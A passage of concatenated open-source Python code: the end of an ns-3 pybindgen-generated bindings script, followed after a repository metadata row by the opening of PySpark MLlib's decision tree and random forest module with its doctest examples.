## config-store.h (module 'config-store'): void ns3::ConfigStore::ConfigureAttributes() [member function]
cls.add_method('ConfigureAttributes',
'void',
[])
## config-store.h (module 'config-store'): void ns3::ConfigStore::ConfigureDefaults() [member function]
cls.add_method('ConfigureDefaults',
'void',
[])
## config-store.h (module 'config-store'): ns3::TypeId ns3::ConfigStore::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## config-store.h (module 'config-store'): static ns3::TypeId ns3::ConfigStore::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## config-store.h (module 'config-store'): void ns3::ConfigStore::SetFileFormat(ns3::ConfigStore::FileFormat format) [member function]
cls.add_method('SetFileFormat',
'void',
[param('ns3::ConfigStore::FileFormat', 'format')])
## config-store.h (module 'config-store'): void ns3::ConfigStore::SetFilename(std::string filename) [member function]
cls.add_method('SetFilename',
'void',
[param('std::string', 'filename')])
## config-store.h (module 'config-store'): void ns3::ConfigStore::SetMode(ns3::ConfigStore::Mode mode) [member function]
cls.add_method('SetMode',
'void',
[param('ns3::ConfigStore::Mode', 'mode')])
return
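# A hedged usage note (not part of the generated file): once these
# bindings are compiled, the registrations above surface roughly as the
# following Python API; the exact import path follows ns-3 convention
# and is an assumption here.
#
#   import ns.config_store
#   store = ns.config_store.ConfigStore()
#   store.SetMode(ns.config_store.ConfigStore.SAVE)
#   store.SetFileFormat(ns.config_store.ConfigStore.RAW_TEXT)
#   store.SetFilename("attributes.txt")
#   store.ConfigureDefaults()
#   store.ConfigureAttributes()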
def register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter< ns3::AttributeAccessor > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter< ns3::AttributeChecker > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter< ns3::AttributeValue > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount(ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter< ns3::CallbackImplBase > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter< ns3::TraceSourceAccessor > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3TraceSourceAccessor_methods(root_module, cls):
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor(ns3::TraceSourceAccessor const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TraceSourceAccessor const &', 'arg0')])
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor() [constructor]
cls.add_constructor([])
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Connect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function]
cls.add_method('Connect',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::ConnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
cls.add_method('ConnectWithoutContext',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Disconnect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function]
cls.add_method('Disconnect',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::DisconnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
cls.add_method('DisconnectWithoutContext',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeAccessor_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor(ns3::AttributeAccessor const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeAccessor const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): bool ns3::AttributeAccessor::Get(ns3::ObjectBase const * object, ns3::AttributeValue & attribute) const [member function]
cls.add_method('Get',
'bool',
[param('ns3::ObjectBase const *', 'object'), param('ns3::AttributeValue &', 'attribute')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasGetter() const [member function]
cls.add_method('HasGetter',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasSetter() const [member function]
cls.add_method('HasSetter',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::Set(ns3::ObjectBase * object, ns3::AttributeValue const & value) const [member function]
cls.add_method('Set',
'bool',
[param('ns3::ObjectBase *', 'object', transfer_ownership=False), param('ns3::AttributeValue const &', 'value')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeChecker_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker(ns3::AttributeChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeChecker const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): bool ns3::AttributeChecker::Check(ns3::AttributeValue const & value) const [member function]
cls.add_method('Check',
'bool',
[param('ns3::AttributeValue const &', 'value')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeChecker::Copy(ns3::AttributeValue const & source, ns3::AttributeValue & destination) const [member function]
cls.add_method('Copy',
'bool',
[param('ns3::AttributeValue const &', 'source'), param('ns3::AttributeValue &', 'destination')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::Create() const [member function]
cls.add_method('Create',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::CreateValidValue(ns3::AttributeValue const & value) const [member function]
cls.add_method('CreateValidValue',
'ns3::Ptr< ns3::AttributeValue >',
[param('ns3::AttributeValue const &', 'value')],
is_const=True)
## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetUnderlyingTypeInformation() const [member function]
cls.add_method('GetUnderlyingTypeInformation',
'std::string',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetValueTypeName() const [member function]
cls.add_method('GetValueTypeName',
'std::string',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeChecker::HasUnderlyingTypeInformation() const [member function]
cls.add_method('HasUnderlyingTypeInformation',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeValue_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue(ns3::AttributeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeValue const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_pure_virtual=True, is_virtual=True)
## attribute.h (module 'core'): std::string ns3::AttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3CallbackChecker_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker(ns3::CallbackChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackChecker const &', 'arg0')])
return
def register_Ns3CallbackImplBase_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase(ns3::CallbackImplBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackImplBase const &', 'arg0')])
## callback.h (module 'core'): bool ns3::CallbackImplBase::IsEqual(ns3::Ptr<ns3::CallbackImplBase const> other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ptr< ns3::CallbackImplBase const >', 'other')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3CallbackValue_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackValue const &', 'arg0')])
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackBase const & base) [constructor]
cls.add_constructor([param('ns3::CallbackBase const &', 'base')])
## callback.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::CallbackValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## callback.h (module 'core'): bool ns3::CallbackValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## callback.h (module 'core'): std::string ns3::CallbackValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## callback.h (module 'core'): void ns3::CallbackValue::Set(ns3::CallbackBase base) [member function]
cls.add_method('Set',
'void',
[param('ns3::CallbackBase', 'base')])
return
def register_Ns3EmptyAttributeValue_methods(root_module, cls):
## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue(ns3::EmptyAttributeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EmptyAttributeValue const &', 'arg0')])
## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::EmptyAttributeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, visibility='private', is_virtual=True)
## attribute.h (module 'core'): bool ns3::EmptyAttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
visibility='private', is_virtual=True)
## attribute.h (module 'core'): std::string ns3::EmptyAttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3TypeIdChecker_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker(ns3::TypeIdChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeIdChecker const &', 'arg0')])
return
def register_Ns3TypeIdValue_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeIdValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeIdValue const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeId const & value) [constructor]
cls.add_constructor([param('ns3::TypeId const &', 'value')])
## type-id.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::TypeIdValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## type-id.h (module 'core'): bool ns3::TypeIdValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeIdValue::Get() const [member function]
cls.add_method('Get',
'ns3::TypeId',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeIdValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## type-id.h (module 'core'): void ns3::TypeIdValue::Set(ns3::TypeId const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::TypeId const &', 'value')])
return
def register_functions(root_module):
module = root_module
register_functions_ns3_FatalImpl(module.get_submodule('FatalImpl'), root_module)
return
def register_functions_ns3_FatalImpl(module, root_module):
return
def main():
out = FileCodeSink(sys.stdout)
root_module = module_init()
register_types(root_module)
register_methods(root_module)
register_functions(root_module)
root_module.generate(out)
if __name__ == '__main__':
main()
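# A hedged usage note (an assumption about the surrounding build setup):
# ns-3's bindings scan runs generators like this one and captures stdout,
# since main() writes the generated C++ through FileCodeSink(sys.stdout);
# roughly:
#
#   python modulegen__gcc_LP64.py > ns3module.cc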
| gpl-2.0 |
rikima/spark | python/pyspark/mllib/tree.py | 24 | 24125 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import sys
import random
from pyspark import SparkContext, RDD, since
from pyspark.mllib.common import callMLlibFunc, inherit_doc, JavaModelWrapper
from pyspark.mllib.linalg import _convert_to_vector
from pyspark.mllib.regression import LabeledPoint
from pyspark.mllib.util import JavaLoader, JavaSaveable
__all__ = ['DecisionTreeModel', 'DecisionTree', 'RandomForestModel',
'RandomForest', 'GradientBoostedTreesModel', 'GradientBoostedTrees']
class TreeEnsembleModel(JavaModelWrapper, JavaSaveable):
"""TreeEnsembleModel
.. versionadded:: 1.3.0
"""
@since("1.3.0")
def predict(self, x):
"""
Predict values for a single data point or an RDD of points using
the model trained.
.. note:: In Python, predict cannot currently be used within an RDD
transformation or action.
Call predict directly on the RDD instead.
"""
if isinstance(x, RDD):
return self.call("predict", x.map(_convert_to_vector))
else:
return self.call("predict", _convert_to_vector(x))
@since("1.3.0")
def numTrees(self):
"""
Get number of trees in ensemble.
"""
return self.call("numTrees")
@since("1.3.0")
def totalNumNodes(self):
"""
Get total number of nodes, summed over all trees in the ensemble.
"""
return self.call("totalNumNodes")
def __repr__(self):
""" Summary of model """
return self._java_model.toString()
@since("1.3.0")
def toDebugString(self):
""" Full model """
return self._java_model.toDebugString()
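# A hedged usage sketch (not part of the original module) of the predict
# contract noted above: do not call predict inside an RDD transformation;
# map out the feature vectors first and predict on the whole RDD.
#
#   # wrong -- captures the JVM-backed model inside a worker-side closure:
#   # rdd.map(lambda p: model.predict(p.features))
#   # right -- one distributed call, then zip back with the labels:
#   # predictions = model.predict(rdd.map(lambda p: p.features))
#   # labels_and_preds = rdd.map(lambda p: p.label).zip(predictions)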
class DecisionTreeModel(JavaModelWrapper, JavaSaveable, JavaLoader):
"""
A decision tree model for classification or regression.
.. versionadded:: 1.1.0
"""
@since("1.1.0")
def predict(self, x):
"""
Predict the label of one or more examples.
.. note:: In Python, predict cannot currently be used within an RDD
transformation or action.
Call predict directly on the RDD instead.
:param x:
Data point (feature vector), or an RDD of data points (feature
vectors).
"""
if isinstance(x, RDD):
return self.call("predict", x.map(_convert_to_vector))
else:
return self.call("predict", _convert_to_vector(x))
@since("1.1.0")
def numNodes(self):
"""Get number of nodes in tree, including leaf nodes."""
return self._java_model.numNodes()
@since("1.1.0")
def depth(self):
"""
Get depth of tree (e.g. depth 0 means 1 leaf node, depth 1
means 1 internal node + 2 leaf nodes).
"""
return self._java_model.depth()
def __repr__(self):
""" summary of model. """
return self._java_model.toString()
@since("1.2.0")
def toDebugString(self):
""" full model. """
return self._java_model.toDebugString()
@classmethod
def _java_loader_class(cls):
return "org.apache.spark.mllib.tree.model.DecisionTreeModel"
class DecisionTree(object):
"""
Learning algorithm for a decision tree model for classification or
regression.
.. versionadded:: 1.1.0
"""
@classmethod
def _train(cls, data, type, numClasses, features, impurity="gini", maxDepth=5, maxBins=32,
minInstancesPerNode=1, minInfoGain=0.0):
first = data.first()
assert isinstance(first, LabeledPoint), "the data should be an RDD of LabeledPoint"
model = callMLlibFunc("trainDecisionTreeModel", data, type, numClasses, features,
impurity, maxDepth, maxBins, minInstancesPerNode, minInfoGain)
return DecisionTreeModel(model)
@classmethod
@since("1.1.0")
def trainClassifier(cls, data, numClasses, categoricalFeaturesInfo,
impurity="gini", maxDepth=5, maxBins=32, minInstancesPerNode=1,
minInfoGain=0.0):
"""
Train a decision tree model for classification.
:param data:
Training data: RDD of LabeledPoint. Labels should take values
{0, 1, ..., numClasses-1}.
:param numClasses:
Number of classes for classification.
:param categoricalFeaturesInfo:
Map storing arity of categorical features. An entry (n -> k)
indicates that feature n is categorical with k categories
indexed from 0: {0, 1, ..., k-1}.
:param impurity:
Criterion used for information gain calculation.
Supported values: "gini" or "entropy".
(default: "gini")
:param maxDepth:
Maximum depth of tree (e.g. depth 0 means 1 leaf node, depth 1
means 1 internal node + 2 leaf nodes).
(default: 5)
:param maxBins:
Number of bins used for finding splits at each node.
(default: 32)
:param minInstancesPerNode:
Minimum number of instances required at child nodes to create
the parent split.
(default: 1)
:param minInfoGain:
Minimum info gain required to create a split.
(default: 0.0)
:return:
DecisionTreeModel.
Example usage:
>>> from numpy import array
>>> from pyspark.mllib.regression import LabeledPoint
>>> from pyspark.mllib.tree import DecisionTree
>>>
>>> data = [
... LabeledPoint(0.0, [0.0]),
... LabeledPoint(1.0, [1.0]),
... LabeledPoint(1.0, [2.0]),
... LabeledPoint(1.0, [3.0])
... ]
>>> model = DecisionTree.trainClassifier(sc.parallelize(data), 2, {})
>>> print(model)
DecisionTreeModel classifier of depth 1 with 3 nodes
>>> print(model.toDebugString())
DecisionTreeModel classifier of depth 1 with 3 nodes
If (feature 0 <= 0.5)
Predict: 0.0
Else (feature 0 > 0.5)
Predict: 1.0
<BLANKLINE>
>>> model.predict(array([1.0]))
1.0
>>> model.predict(array([0.0]))
0.0
>>> rdd = sc.parallelize([[1.0], [0.0]])
>>> model.predict(rdd).collect()
[1.0, 0.0]
"""
return cls._train(data, "classification", numClasses, categoricalFeaturesInfo,
impurity, maxDepth, maxBins, minInstancesPerNode, minInfoGain)
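# A hedged example (not part of the original module) of the
# categoricalFeaturesInfo mapping documented above: with {0: 2, 2: 4},
# feature 0 is categorical with categories {0, 1} and feature 2 has
# categories {0, 1, 2, 3}; features absent from the map are continuous.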
@classmethod
@since("1.1.0")
def trainRegressor(cls, data, categoricalFeaturesInfo,
impurity="variance", maxDepth=5, maxBins=32, minInstancesPerNode=1,
minInfoGain=0.0):
"""
Train a decision tree model for regression.
:param data:
Training data: RDD of LabeledPoint. Labels are real numbers.
:param categoricalFeaturesInfo:
Map storing arity of categorical features. An entry (n -> k)
indicates that feature n is categorical with k categories
indexed from 0: {0, 1, ..., k-1}.
:param impurity:
Criterion used for information gain calculation.
The only supported value for regression is "variance".
(default: "variance")
:param maxDepth:
Maximum depth of tree (e.g. depth 0 means 1 leaf node, depth 1
means 1 internal node + 2 leaf nodes).
(default: 5)
:param maxBins:
Number of bins used for finding splits at each node.
(default: 32)
:param minInstancesPerNode:
Minimum number of instances required at child nodes to create
the parent split.
(default: 1)
:param minInfoGain:
Minimum info gain required to create a split.
(default: 0.0)
:return:
DecisionTreeModel.
Example usage:
>>> from pyspark.mllib.regression import LabeledPoint
>>> from pyspark.mllib.tree import DecisionTree
>>> from pyspark.mllib.linalg import SparseVector
>>>
>>> sparse_data = [
... LabeledPoint(0.0, SparseVector(2, {0: 0.0})),
... LabeledPoint(1.0, SparseVector(2, {1: 1.0})),
... LabeledPoint(0.0, SparseVector(2, {0: 0.0})),
... LabeledPoint(1.0, SparseVector(2, {1: 2.0}))
... ]
>>>
>>> model = DecisionTree.trainRegressor(sc.parallelize(sparse_data), {})
>>> model.predict(SparseVector(2, {1: 1.0}))
1.0
>>> model.predict(SparseVector(2, {1: 0.0}))
0.0
>>> rdd = sc.parallelize([[0.0, 1.0], [0.0, 0.0]])
>>> model.predict(rdd).collect()
[1.0, 0.0]
"""
return cls._train(data, "regression", 0, categoricalFeaturesInfo,
impurity, maxDepth, maxBins, minInstancesPerNode, minInfoGain)
@inherit_doc
class RandomForestModel(TreeEnsembleModel, JavaLoader):
"""
Represents a random forest model.
.. versionadded:: 1.2.0
"""
@classmethod
def _java_loader_class(cls):
return "org.apache.spark.mllib.tree.model.RandomForestModel"
class RandomForest(object):
"""
Learning algorithm for a random forest model for classification or
regression.
.. versionadded:: 1.2.0
"""
supportedFeatureSubsetStrategies = ("auto", "all", "sqrt", "log2", "onethird")
@classmethod
def _train(cls, data, algo, numClasses, categoricalFeaturesInfo, numTrees,
featureSubsetStrategy, impurity, maxDepth, maxBins, seed):
first = data.first()
assert isinstance(first, LabeledPoint), "the data should be an RDD of LabeledPoint"
if featureSubsetStrategy not in cls.supportedFeatureSubsetStrategies:
raise ValueError("unsupported featureSubsetStrategy: %s" % featureSubsetStrategy)
if seed is None:
seed = random.randint(0, 1 << 30)
model = callMLlibFunc("trainRandomForestModel", data, algo, numClasses,
categoricalFeaturesInfo, numTrees, featureSubsetStrategy, impurity,
maxDepth, maxBins, seed)
return RandomForestModel(model)
@classmethod
@since("1.2.0")
def trainClassifier(cls, data, numClasses, categoricalFeaturesInfo, numTrees,
featureSubsetStrategy="auto", impurity="gini", maxDepth=4, maxBins=32,
seed=None):
"""
Train a random forest model for binary or multiclass
classification.
:param data:
Training dataset: RDD of LabeledPoint. Labels should take values
{0, 1, ..., numClasses-1}.
:param numClasses:
Number of classes for classification.
:param categoricalFeaturesInfo:
Map storing arity of categorical features. An entry (n -> k)
indicates that feature n is categorical with k categories
indexed from 0: {0, 1, ..., k-1}.
:param numTrees:
Number of trees in the random forest.
:param featureSubsetStrategy:
Number of features to consider for splits at each node.
Supported values: "auto", "all", "sqrt", "log2", "onethird".
If "auto" is set, this parameter is set based on numTrees:
if numTrees == 1, set to "all";
            if numTrees > 1 (forest), set to "sqrt".
(default: "auto")
:param impurity:
Criterion used for information gain calculation.
Supported values: "gini" or "entropy".
(default: "gini")
:param maxDepth:
Maximum depth of tree (e.g. depth 0 means 1 leaf node, depth 1
means 1 internal node + 2 leaf nodes).
(default: 4)
:param maxBins:
Maximum number of bins used for splitting features.
(default: 32)
:param seed:
Random seed for bootstrapping and choosing feature subsets.
Set as None to generate seed based on system time.
(default: None)
:return:
RandomForestModel that can be used for prediction.
Example usage:
>>> from pyspark.mllib.regression import LabeledPoint
>>> from pyspark.mllib.tree import RandomForest
>>>
>>> data = [
... LabeledPoint(0.0, [0.0]),
... LabeledPoint(0.0, [1.0]),
... LabeledPoint(1.0, [2.0]),
... LabeledPoint(1.0, [3.0])
... ]
>>> model = RandomForest.trainClassifier(sc.parallelize(data), 2, {}, 3, seed=42)
>>> model.numTrees()
3
>>> model.totalNumNodes()
7
>>> print(model)
TreeEnsembleModel classifier with 3 trees
<BLANKLINE>
>>> print(model.toDebugString())
